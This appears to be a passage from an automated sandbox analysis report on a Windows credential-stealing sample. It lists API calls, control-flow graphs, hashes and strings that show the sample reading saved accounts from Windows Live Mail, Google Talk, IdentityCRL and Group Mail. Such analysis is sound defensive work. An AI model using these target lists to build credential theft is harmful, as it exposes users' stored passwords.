                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                              • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                              • API String ID: 2768085393-1693574875
                                                                                                                                                              • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                                                                              • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                                                                              • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                                                                              • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0044430B
                                                                                                                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                                                                • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                                                                • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                                                                • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                              • memset.MSVCRT ref: 00444379
                                                                                                                                                              • memset.MSVCRT ref: 00444394
                                                                                                                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                                                              • strlen.MSVCRT ref: 004443DB
                                                                                                                                                              • _strcmpi.MSVCRT ref: 00444401
                                                                                                                                                              Strings
                                                                                                                                                              • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                                                              • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                                                              • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                                                              • Store Root, xrefs: 004443A5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                              • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                              • API String ID: 832325562-2578778931
                                                                                                                                                              • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                                                                              • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                                                                              • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                                                                              • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 317 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 322 40f5c3-40f5ea RegQueryValueExA 317->322 323 40f6d9-40f6df 317->323 324 40f6d0-40f6d3 RegCloseKey 322->324 325 40f5f0-40f5f4 322->325 324->323 325->324 326 40f5fa-40f604 325->326 327 40f606-40f618 call 40466b call 404734 326->327 328 40f677 326->328 338 40f66a-40f675 call 404785 327->338 339 40f61a-40f63e call 4047a5 327->339 329 40f67a-40f67d 328->329 329->324 331 40f67f-40f6bf call 4012ee RegQueryValueExA 329->331 331->324 337 40f6c1-40f6cf 331->337 337->324 338->329 339->338 344 40f640-40f643 339->344 345 40f661-40f664 LocalFree 344->345 346 40f645-40f65a memcpy 344->346 345->338 346->345
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040F567
                                                                                                                                                              • memset.MSVCRT ref: 0040F57F
                                                                                                                                                                • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                              • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                                                              • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2012582556-3916222277
                                                                                                                                                              • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                                                                              • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                                                                              • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                                                                              • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 347 4037ca-40381c memset * 2 call 444551 350 4038e2-4038e5 347->350 351 403822-403882 call 4021b6 call 406f06 * 2 strchr 347->351 358 403884-403895 _mbscpy 351->358 359 403897-4038a2 strlen 351->359 360 4038bf-4038dd _mbscpy call 4023e5 358->360 359->360 361 4038a4-4038bc sprintf 359->361 360->350 361->360
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 004037EB
                                                                                                                                                              • memset.MSVCRT ref: 004037FF
                                                                                                                                                                • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                                                                • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                              • strchr.MSVCRT ref: 0040386E
                                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                                                              • strlen.MSVCRT ref: 00403897
                                                                                                                                                              • sprintf.MSVCRT ref: 004038B7
                                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                              • String ID: %s@yahoo.com
                                                                                                                                                              • API String ID: 317221925-3288273942
                                                                                                                                                              • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                                                                              • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                                                                              • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                                                                              • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 363 404a99-404ac2 LoadLibraryA 364 404ac4-404ad2 GetProcAddress 363->364 365 404aec-404af4 363->365 366 404ad4-404ad8 364->366 367 404add-404ae6 FreeLibrary 364->367 370 404af5-404afa 365->370 371 404adb 366->371 367->365 368 404ae8-404aea 367->368 368->370 372 404b13-404b17 370->372 373 404afc-404b12 MessageBoxA 370->373 371->367
                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryA.KERNEL32(comctl32.dll,74DF0A60,?,00000000,?,?,?,0040CF60,74DF0A60), ref: 00404AB8
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,74DF0A60), ref: 00404ADE
                                                                                                                                                              • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                              • API String ID: 2780580303-317687271
                                                                                                                                                              • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                              • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                                                                                              • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                              • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 374 4034e4-403544 memset * 2 call 410b1e 377 403580-403582 374->377 378 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 374->378 378->377
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00403504
                                                                                                                                                              • memset.MSVCRT ref: 0040351A
                                                                                                                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                              • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                              • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                              • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                              • API String ID: 3071782539-966475738
                                                                                                                                                              • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                                                                              • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                                                              • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                                                                              • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 383 40ccd7-40cd06 ??2@YAPAXI@Z 384 40cd08-40cd0d 383->384 385 40cd0f 383->385 386 40cd11-40cd24 ??2@YAPAXI@Z 384->386 385->386 387 40cd26-40cd2d call 404025 386->387 388 40cd2f 386->388 390 40cd31-40cd57 387->390 388->390 391 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 390->391 392 40cd59-40cd60 DeleteObject 390->392 392->391
                                                                                                                                                              APIs
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000), ref: 0040CCFE
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00001324,00000000), ref: 0040CD1C
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0040CD5A
                                                                                                                                                              • memset.MSVCRT ref: 0040CD96
                                                                                                                                                              • LoadIconA.USER32(00000065), ref: 0040CDA6
                                                                                                                                                              • _mbscpy.MSVCRT(?,00000000,?,00000000), ref: 0040CDC4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2054149589-0
                                                                                                                                                              • Opcode ID: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                                                                              • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                                                              • Opcode Fuzzy Hash: fd02f05bf49073eee5ccc1a550db9cbce84ddbb83c717146c7427eb187f58741
                                                                                                                                                              • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 400 44b40e-44b415 GetModuleHandleA 401 44b455 400->401 402 44b417-44b426 call 44b42b 400->402 404 44b457-44b45b 401->404 412 44b48d 402->412 413 44b428-44b433 GetProcAddress 402->413 406 44b45d-44b465 GetModuleHandleA 404->406 407 44b49a call 44b49f 404->407 410 44b467-44b46f 406->410 410->410 411 44b471-44b474 410->411 411->404 415 44b476-44b478 411->415 416 44b48e-44b496 412->416 413->401 414 44b435-44b442 VirtualProtect 413->414 417 44b454 414->417 418 44b444-44b452 VirtualProtect 414->418 419 44b47e-44b486 415->419 420 44b47a-44b47c 415->420 422 44b498 416->422 417->401 418->417 423 44b487-44b488 GetProcAddress 419->423 420->423 422->411 423->412
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                • Part of subcall function 0044B42B: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                • Part of subcall function 0044B42B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2099061454-0
                                                                                                                                                              • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                              • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                                                                                                                                                              • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                              • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                                                                • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                              • memset.MSVCRT ref: 00408620
                                                                                                                                                                • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                              • memset.MSVCRT ref: 00408671
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                                                              Strings
                                                                                                                                                              • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                                                              • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                              • API String ID: 1366857005-1079885057
                                                                                                                                                              • Opcode ID: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                                                                              • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                                                              • Opcode Fuzzy Hash: 714fcd6f1c4457602f236ccea557fa2655140a2be8e65fd4c30709a0660f34b2
                                                                                                                                                              • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Cursor_mbsicmpqsort
                                                                                                                                                              • String ID: /nosort$/sort
                                                                                                                                                              • API String ID: 882979914-1578091866
                                                                                                                                                              • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                                                                              • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                                                              • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                                                                                                                              • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                                • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                                                                                                                • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                                • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                                • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2099061454-0
                                                                                                                                                              • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                              • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                                                                              • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                              • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                                                                              APIs
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                                                                              • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                                                                              • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2152742572-0
                                                                                                                                                              • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                              • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                                                                              • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                              • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,74DF0A60,?,00000000), ref: 00410D1C
                                                                                                                                                                • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                              • memset.MSVCRT ref: 00410E10
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                              • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                              Strings
